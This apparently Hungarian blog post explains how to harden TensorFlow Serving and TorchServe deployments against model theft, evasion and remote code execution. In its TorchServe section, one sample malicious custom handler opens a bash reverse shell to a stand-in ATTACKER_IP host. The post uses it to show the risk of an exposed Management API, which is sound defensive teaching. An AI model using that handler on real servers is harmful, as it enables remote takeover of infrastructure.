Biztonságos Modellkiszolgálás: A TensorFlow Serving és TorchServe infrastruktúra megerősítése

2025.10.17.
AI Biztonság Blog

A modell a kapunál: TensorFlow Serving és TorchServe erődítmények építése

Képzeld el a helyzetet. Hónapok, talán évek munkája van benne. Adatgyűjtés, tisztítás, végtelen kísérletezés, GPU-k izzítása éjjel-nappal. Végül megszületik: a Modell. Egy csodálatos, komplex neurális háló, ami képes megoldani egy valós üzleti problémát. A csapat ünnepel, a menedzsment pezsgőt bont. A DevOps csapat megkapja a kész modellt, becsomagolja egy TensorFlow Serving vagy TorchServe konténerbe, és egyetlen paranccsal elindítja a „production” környezetben. Kész. Vagy mégsem?

A pezsgő íze még a szádban van, de te már érzed a hideg verejtéket a hátadon. Mert tudod, hogy amit a csapatod éppen csinált, az nem egy szoftver bevezetése volt. Hanem egy új, ismeretlen és potenciálisan veszélyes kapu megnyitása a rendszered szívébe.

Kapcsolati űrlap

AI Biztonság kérdésed van? Itt elérsz minket:

Az AI modellek kiszolgálása nem csak egy újabb IT feladat a listán. Ez egy teljesen új támadási felület, amit a legtöbb cég még csak most kezd felfedezni – gyakran a saját kárán. Elfelejtjük, hogy egy modell nem csak egy passzív adathalmaz. Egy aktív, döntéshozó komponens, amit ha megtámadnak, az nem csak adatlopáshoz, hanem katasztrofális üzleti károkhoz, manipulált döntésekhez és a teljes rendszer kompromittálásához vezethet.

Ebben a posztban nem a modellek matematikai hátteréről fogunk beszélni. Nem fogunk a legújabb neurális háló architektúrákról áradozni. A piszkos, de létfontosságú részletekről lesz szó: hogyan építsünk egy olyan erődítményt a TensorFlow Serving és TorchServe köré, ami ellenáll a támadásoknak. Mert a legokosabb modell is csak annyira ér, amennyire a környezete biztonságos.

Az új csatatér: Miért rémálom egy AI modell kiszolgálása a biztonság szempontjából?

Gondolj egy AI modellre úgy, mint egy lezuhant UFO-ra. Megtaláltad, nem tudod pontosan, hogyan működik minden egyes áramköre, de rájöttél, hogyan lehet belőle hasznos energiát kinyerni. Úgy döntesz, rákötöd a városi elektromos hálózatra. Mi baj lehet, igaz?

Ez a helyzet a legtöbb modellel. A belső működésük egy „fekete doboz”. Tudjuk, milyen bemenetre mit ad, de a köztes állapotok milliárdjai kifürkészhetetlenek. Ezt a fekete dobozt tesszük ki egy API végponton keresztül a világnak. Ezzel egy olyan kaput nyitunk, ami teljesen másképp viselkedik, mint egy hagyományos, szabály-alapú szoftver.

A támadási vektorok itt nem csak a klasszikus szoftveres sebezhetőségekről szólnak. Itt van a menü:

  • Modelllopás (Intellectual Property Theft): A modelled a céged szellemi tulajdonának csúcsa. Több millió dollárnyi kutatás és adat van benne. Egy támadó, aki eleget tudja hívogatni az API-dat, képes lehet egy „klón” modellt létrehozni (ezt hívják model extraction-nek), és ellopni a versenyelőnyödet.
  • Kikerülés (Evasion Attacks): A támadó speciálisan preparált bemeneti adatokkal eteti a modellt, hogy az rossz döntést hozzon. Képzeld el, hogy egy képről kell eldönteni, hogy egy stoptábla van-e rajta. Egy jól sikerült adversarial attack során a támadó egy apró, emberi szemmel láthatatlan „zajt” ad a képhez, amitől a modell 99.9%-os biztonsággal azt fogja mondani, hogy az egy „sebességkorlátozás feloldása” tábla. Vagy egy spam szűrő, ami átenged egy rosszindulatú emailt, mert pár karaktert furcsán módosítottak benne.
  • Adatmérgezés (Data Poisoning): Ez egy alattomosabb támadás. Ha a modell folyamatosan tanul a bejövő adatokból, a támadó szándékosan rossz, manipulatív adatokat küldhet be, hogy lassan „elmérgezze” a modell tudását, és a jövőbeni döntéseit a saját céljai szerint torzítsa.
  • Infrastruktúra átvétele (Infrastructure Takeover): És persze ne feledkezzünk meg a jó öreg klasszikusokról sem. A modellkiszolgáló keretrendszer is csak egy szoftver. Vannak sebezhetőségei, konfigurációs hibái. Egy rosszul beállított TorchServe vagy TensorFlow Serving maga is lehet a kapu egy Remote Code Execution (RCE) támadáshoz, ahol a támadó lényegében egy parancssort kap a te szervereden.

Az AI modellkiszolgáló infrastruktúra egy komplex rendszer, ahol minden egyes elem egy potenciális gyenge pont. A támadó nem feltétlenül a modellt magát, hanem a leggyengébb láncszemet fogja keresni.

Az AI Kiszolgáló Infrastruktúra Támadási Felülete Támadó (Internet) API Gateway / Reverse Proxy Kiszolgáló Keretrendszer (TF Serving / TorchServe) Modell API Management API Modell Fájlok OS / Konténer 1. API Támadás 2. Kikerült védelem 3. Modell lopás/manipuláció 4. Rendszer kompromittálás
Az AI biztonság nem arról szól, hogy megakadályozzuk a modellt a hibázásban. Hanem arról, hogy megakadályozzuk, hogy valaki szándékosan rávegye a hibázásra, és ezt kihasználja.

TensorFlow Serving: A Google erőműve a mikroszkóp alatt

A TensorFlow Serving (TFS) egy igazi igásló. Nagy teljesítményű, C++ alapokon nyugvó rendszer, amit a Google a saját belső igényeire fejlesztett ki. Gyors, stabil, és képes kezelni a hatalmas terhelést. De mint minden erőmű, ha nincsenek meg a megfelelő biztonsági protokollok, katasztrófát okozhat.

A „Default” csapda

A legtöbb TFS tutorial valahogy így néz ki: töltsd le a Docker image-et, csatold fel a modelledet tartalmazó mappát, és indítsd el a konténert a 8501-es port (REST) és a 8500-as port (gRPC) publikálásával. Gratulálok, van egy működő modelled! És egyben egy tátongó biztonsági résed.

Az alapértelmezett beállításokkal a TFS semmilyen authentikációt vagy autorizációt nem végez. Bárki, aki eléri ezt a portot a hálózaton, korlátlanul hívogathatja a modelledet. Ez nem csak DoS (Denial of Service) támadásoknak teszi ki a rendszert, de a már említett modelllopási technikáknak is szabad utat enged.

Ez olyan, mintha egy bankfiókot építenél, aminek van egy szuperbiztos trezorja (a modelled), de a bejárati ajtót elfelejted bezárni éjszakára.

TensorFlow Serving erődítése: Lépésről lépésre

1. Hálózati Izoláció: A Vizesárok

Az első és legfontosabb szabály: SOHA ne tedd ki a TensorFlow Serving portjait közvetlenül az internetre! Ezt nem lehet elégszer hangsúlyozni. A TFS-t egy belső hálózaton kell futtatni, és egy köztes rétegen, például egy API Gateway-en vagy egy megfelelően konfigurált reverse proxy-n (pl. Nginx, Envoy) keresztül kell elérhetővé tenni.

Ez a köztes réteg lesz a várad első védelmi vonala. Itt tudsz beállítani olyan alapvető dolgokat, mint:

  • Rate Limiting: Megakadályozza, hogy egy támadó másodpercenként több ezer kéréssel bombázza a modelledet, leterhelve az erőforrásokat.
  • Authentikáció: Mielőtt egy kérés eljutna a TFS-hez, ez a réteg ellenőrzi, hogy a kérést küldő félnek van-e joga hozzá (pl. érvényes API kulcs, JWT token alapján).
  • Request Sanitization: Alapvető WAF (Web Application Firewall) szabályokkal kiszűrhetők a nyilvánvalóan rosszindulatú, deformált kérések.
Hardened TensorFlow Serving Architektúra Internet API Gateway – Auth (JWT/API Key) – Rate Limiting – WAF Privát Hálózat (VPC) TF Serving Model Storage BLOKKOLVA!

2. Erőforrás-menedzsment: Az éheztetéses támadás ellen

Egy másik gyakori támadás a resource exhaustion, vagyis az erőforrások kimerítése. A támadó olyan kéréseket küld, amik maximálisan leterhelik a CPU-t vagy a GPU-t, ezzel megbénítva a szolgáltatást a legitim felhasználók elől. A TFS kínál néhány eszközt ennek a kivédésére:

  • Batching: A TFS képes a bejövő kéréseket összegyűjteni (batch-elni) és egyszerre feldolgozni a hardveren. Ez növeli a hatékonyságot. A batching paraméterek finomhangolásával (--enable_batching=true, --batching_parameters_file=...) kontrollálhatod, hogy mekkora terhelést engedsz egyszerre a modellre. Egy túl nagyra állított batch méret memóriaproblémákat okozhat.
  • Request Size Limits: Az API Gateway rétegen korlátozd a bejövő kérések maximális méretét. Nincs értelme egy 50 MB-os JSON payloadot fogadni, ha a modelled egy 224×224-es képet vár.

3. Modell Integritás: A viaszpecsét

Honnan tudod, hogy a szerveren futó saved_model.pb fájl tényleg az, amit a data science csapatod készített és validált? Mi van, ha valaki kicserélte egy rosszindulatú vagy egy gyengébb verzióra?

Az MLOps pipeline-odnak tartalmaznia kell egy modellszignózási lépést. A modell fájlokat a build folyamat során egy privát kulccsal digitálisan alá kell írni, és a TFS indításakor vagy egy külön monitorozó scriptnek ellenőriznie kell ezt az aláírást. Ez olyan, mint egy digitális viaszpecsét: garantálja, hogy a modell sértetlen és a megfelelő forrásból származik.

4. Konténerbiztonság: A páncélozott szállítójármű

A TFS-t szinte mindig Docker vagy más konténerben futtatjuk. De nem mindegy, hogyan!

  • Minimális alap image: Ne az ubuntu:latest-re építs. Használj egy minimalista, „distroless” image-et, ami csak a futáshoz legszükségesebb komponenseket tartalmazza. Kevesebb szoftver = kevesebb potenciális sebezhetőség.
  • Futtatás non-root userként: A konténerben futó processznek soha ne legyen root joga. Hozz létre egy dedikált, alacsony jogosultságú usert (USER appuser a Dockerfile-ban), és azzal indítsd a TFS-t. Ha egy támadó valahogy kódfuttatást ér el a konténeren belül, a kár sokkal kisebb lesz.
  • Read-only fájlrendszer: A modell fájlokon kívül a konténer fájlrendszerének nagy részét csatold fel read-only módban. Ez megnehezíti a támadónak, hogy perzisztens malware-t helyezzen el a rendszeren.

Itt egy gyors összehasonlítás, ami jól mutatja a különbséget:

Paraméter Insecure Default (rossz gyakorlat) Hardened Configuration (jó gyakorlat)
Hálózati elérés Portok (8500, 8501) közvetlenül publikálva az internetre. Portok csak a privát hálózaton elérhetők, API Gateway-en keresztül.
Authentikáció Nincs. Bárki hívhatja az API-t. API Gateway-en kötelező API kulcs vagy JWT token validáció.
Konténer User root (alapértelmezett) Dedikált, alacsony jogosultságú user (pl. tfs).
Fájlrendszer Teljesen írható. Read-only root fájlrendszer, csak a modell- és log mappák írhatók.
Modell forrása Bármilyen mappa, amit felcsatolnak. Csak digitálisan aláírt modellek betöltése engedélyezett.

TorchServe: A PyTorch kihívó és a kétélű kardja

A TorchServe a PyTorch közösség válasza a TensorFlow Servingre. Rugalmas, Python-barát, és rendkívül könnyen testreszabható. De ez a rugalmasság egyben a legnagyobb veszélyforrása is.

A TorchServe két fő portot használ alapértelmezetten:

  • 8080: Az Inference API. Ezen keresztül küldöd a bemeneti adatokat a modellnek, és kapod meg a predikciót.
  • 8081: A Management API. Ezen keresztül tudsz modelleket betölteni, eltávolítani, skálázni, vagy lekérdezni a szerver állapotát.

És itt jön a lényeg: a Management API egy hihetetlenül erős, de egyben veszélyes eszköz. Ha egy támadó hozzáfér, lényegében teljes kontrollt szerez a modellkiszolgálód felett.

A TorchServe Management API-jának publikálása az internetre olyan, mintha a házad kulcsát a lábtörlő alá tennéd egy cetlivel, amin rajta van a riasztó kódja.

A Trójai Faló: Egyedi handlerek és a kódfuttatás veszélye

A TorchServe ereje az egyedi handlerekben (custom handlers) rejlik. Ezek Python szkriptek, amik definiálják, hogyan kell a bejövő kérést előfeldolgozni (preprocess), a modellnek átadni, majd a kimenetet utófeldolgozni (postprocess). A modellt és a handlereket egy .mar (Model Archive) fájlba csomagolják.

Mit jelent ez a biztonság szempontjából? Azt, hogy bárki, aki fel tud tölteni egy .mar fájlt a Management API-n keresztül, lényegében tetszőleges Python kódot tud futtatni a szervereden.

Elég egy ilyen handler:


# malicious_handler.py
import os

class MaliciousHandler(BaseHandler):
    def preprocess(self, data):
        # Nem csinál semmit a bemenettel
        return data

    def inference(self, data):
        # A lényeg itt van! Futtat egy shell parancsot.
        os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'")
        return ["pwned"]
    
    def postprocess(self, data):
        return data

Ha egy támadó ezt becsomagolja egy .mar fájlba és feltölti a védtelen Management API-don keresztül, abban a pillanatban egy reverse shellt kap a te infrastruktúrádban. Game over.

TorchServe megerősítése: A menedzsment lelakatolása

1. API Szegregáció: Külön kapu a lakóknak és a karbantartóknak

A legfontosabb lépés a két API szigorú szétválasztása. A config.properties fájlban beállíthatod, hogy a két API különböző hálózati interfészeken figyeljen.

  • Inference API (8080): Ezt kösd a publikus vagy a belső, alkalmazások által elérhető hálózati interfészhez (pl. inference_address=tcp://0.0.0.0:8080). Ezt fogja elérni az API Gateway.
  • Management API (8081): Ezt KIZÁRÓLAG a localhost interfészhez kösd (management_address=tcp://127.0.0.1:8081). Ez azt jelenti, hogy csak a gépen belüli processzek (pl. egy SSH tunnelen keresztül csatlakozó adminisztrátor) érhetik el. Soha, semmilyen körülmények között ne legyen elérhető a hálózat többi része számára.
TorchServe API Szegregáció TorchServe Szerver TorchServe Process Inference API (port 8080) Management API (port 8081) NIC Publikus Elérés (API Gateway-n keresztül) Csak Localhost! (127.0.0.1)

2. Konfigurációs Erődítés: A config.properties lezárása

A TorchServe konfigurációs fájlja a te pajzsod. Használd okosan!

  • load_models=: Indításkor add meg, hogy mely modelleket töltse be. Ne hagyatkozz a Management API-ra a production modellek betöltésénél. A modellek legyenek az image részei vagy egy read-only volume-on.
  • allowed_urls=: Ha mégis engedélyezed a modellek URL-ről való letöltését (ami önmagában kockázatos), ezzel a paraméterrel korlátozhatod, hogy csak egy megbízható, általad kontrollált helyről (pl. a saját S3 bucketedből) tölthessen le. Az alapértelmezett "all" egy felhívás keringőre.
  • enable_envvars_config=false: Alapértelmezetten a TorchServe konfigurációját környezeti változókkal is felül lehet bírálni. Ha egy támadó valahogy képes befolyásolni a processz környezeti változóit, átkonfigurálhatja a szerveredet. Kapcsold ki, ha nincs rá feltétlenül szükséged.

Nézzük meg ezt is egy táblázatban:

Paraméter (config.properties) Veszélyes Default Biztonságos Beállítás Indoklás
management_address tcp://127.0.0.1:8081 (Jó, de sokan átírják 0.0.0.0-ra) tcp://127.0.0.1:8081 Megakadályozza a Management API hálózati elérését, ami a legfőbb RCE vektor.
allowed_urls all https://my-secure-model-store.s3.amazonaws.com/.* Megakadályozza, hogy a támadó egy általa kontrollált URL-ről töltsön be rosszindulatú modellt.
enable_model_api true true (de tűzfallal védve!) Az API-t magát nem kell letiltani, de a hozzáférést szigorúan kontrollálni kell (lásd fent).
enable_envvars_config true false Csökkenti a támadási felületet, megakadályozza a konfiguráció futásidejű manipulálását más sebezhetőségeken keresztül.

3. Bemeneti adatok validálása: Ne bízz senkiben!

Még ha a Management API le is van zárva, az Inference API is lehet veszélyforrás. Az egyedi handler-ed Python kód. Mi történik, ha egy rosszul megírt előfeldolgozó lépés sebezhető egy pickle deserialization támadásra, vagy ha egy stringként érkező bemenetet nem megfelelően validál, és az egy OS command injection-höz vezet?

A handler kódodat kezeld ugyanolyan szigorral, mint bármelyik más production kódot:

  • Szigorú típusellenőrzés: Ha számot vársz, konvertáld számmá, és kezeld a hibát, ha nem sikerül. Ha egy képet vársz, ellenőrizd a fájl formátumát és méretét.
  • Szanitizálás: Soha ne add át a felhasználói bemenetet közvetlenül egy shell parancsnak vagy egy eval()-nak.
  • Dependency Scanning: A handler-ednek lehetnek függőségei. Futtass rajtuk rendszeresen biztonsági scannereket (pl. pip-audit), hogy ne húzz be egy sebezhető könyvtárat.

A keretrendszereken túl: A holisztikus védelem

A TensorFlow Serving és a TorchServe megerősítése csak a csata fele. A valódi biztonság egy többrétegű, folyamatos tevékenység. Nem elég egyszer beállítani a dolgokat és utána elfelejteni.

Látni és látszani: Naplózás és Monitorozás

Nem tudod megvédeni azt, amit nem látsz. A modellkiszolgálódnak beszélnie kell hozzád. Naplózz mindent, ami releváns lehet:

  • Minden egyes inferencia kérés: Ki, mikor, milyen modellhez, milyen bemeneti mérettel és milyen eredménnyel fért hozzá.
  • Minden menedzsment művelet: Modell betöltése, törlése, skálázása – ezek kritikus események.
  • Hibaüzenetek: A sikertelen kérések, a furcsa bemeneti adatok miatti hibák gyakran egy támadási kísérlet első jelei.
  • Erőforrás-használat: CPU, GPU, memória. Egy hirtelen kiugrás DoS támadásra vagy egy erőforrás-igényes rosszindulatú modellre utalhat.

Ezeket a logokat ne csak tárold, hanem aktívan monitorozd is! Állíts be riasztásokat anomáliákra: szokatlanul magas hibaarány, kérések egyetlen IP címről, a predikciók eloszlásának hirtelen megváltozása (ami modellmérgezésre utalhat).

A humán faktor: A leggyengébb láncszem

A legbiztonságosabb technológiai erődítményt is le lehet győzni, ha a kapu őre beengedi az ellenséget. A fejlesztőknek, MLOps mérnököknek és data scientisteknek is tisztában kell lenniük a veszélyekkel. A biztonságos kódolási gyakorlatok (a handlerek esetében), a gyanús modellek felismerése és a biztonságos deployment folyamatok betartása elengedhetetlen.

Egy automatizált MLOps pipeline, ami kötelezővé teszi a kódellenőrzést, a security scannelést és a modell szignózását, többet ér, mint bármilyen tűzfalszabály.

Támadd magad, mielőtt más tenné!

Az utolsó lépés a proaktív védekezés. Ne várd meg, amíg egy valódi támadó megtalálja a réseket. Keressétek ti magatok!

  • Vulnerability Scanning: Futtassatok rendszeres scannereket a konténer image-eken és a hoszt operációs rendszeren.
  • Penetration Testing: Bízzatok meg egy külsős (vagy belsős) red teamet, hogy próbálja meg feltörni a rendszert.
  • AI-specifikus tesztek: Próbáljatok ki evasion attack technikákat. Generáljatok adversarial példákat, és nézzétek meg, hogyan reagál a modelletek. Fuzzingoljátok az API végpontokat véletlenszerű, deformált adatokkal.

Végszó

Egy AI modell productionbe helyezése izgalmas mérföldkő. De a munka itt nem ér véget, sőt, a biztonság szempontjából csak itt kezdődik. A TensorFlow Serving és a TorchServe fantasztikus eszközök, de alapértelmezett állapotukban nyitott könyvek a támadók számára.

A modellkiszolgálás biztonsága nem egy egyszeri feladat, hanem egy szemléletmód. A hálózati izolációtól a konténerbiztonságon át a folyamatos monitorozásig minden egyes réteg számít. Minden egyes konfigurációs paraméter egy döntés a kényelem és a biztonság között.

Ne feledd: a legkifinomultabb támadás sem ér semmit egy jól felkészült védelem ellen. A kérdés nem az, hogy a te modelled célpont lesz-e, hanem az, hogy mikor. És te felkészültél rá?

MI Megfelelőség: Gyakorlati útmutató az EU AI Act, GDPR és NIS2 követelményekhez

2025.10.17.

MI Támadó (Red Team) Eszköztár: ART, CleverHans és Foolbox összehasonlítása

2025.10.17.

Kapcsolat

Rácz-Akácosi Attila, Stratégiai AI Biztonsági Tanácsadó, Aiq.hu ©

Küldj egy emailt a részletekkel, és segítek konkrét lépéseket felvázolni a biztonságosabb AI működés felé.

Ai Red Teaming Hungary, Ai Red Teaming Magyarország

Ai Red teaming Szótár

AI Biztonság Villám Audit